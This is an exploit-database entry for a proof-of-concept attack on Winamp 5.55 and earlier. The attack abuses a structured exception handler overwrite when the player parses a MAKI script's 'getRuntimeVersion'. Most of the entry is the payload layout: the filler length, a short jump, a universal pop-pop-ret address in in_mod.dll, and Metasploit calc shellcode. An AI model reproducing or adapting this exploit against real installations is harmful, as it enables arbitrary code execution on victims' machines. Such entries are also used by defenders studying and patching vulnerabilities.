Winamp <= 5.55 (MAKI script) Universal Seh Overwrite PoC

2009-05-22T00:00:00
ID 1337DAY-ID-6871
Type zdt
Reporter His0k4
Modified 2009-05-22T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ========================================================
Winamp <= 5.55 (MAKI script) Universal Seh Overwrite PoC
========================================================


[x] Bug: Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit
[x] Exploited By His0k4

[x] Description: The vulnerabilty is due when parsing a maki script file exactly in the "getRuntimeVersion"
                 and we can overwrite the seh easily :)
				 
The exploit schema looks like this:
payload = "\x41"*16756
payload += "\x74\x06\x90\x90"
payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod.dll
payload += shellcode # calc shellcode from metasploit




#  0day.today [2018-01-08]  #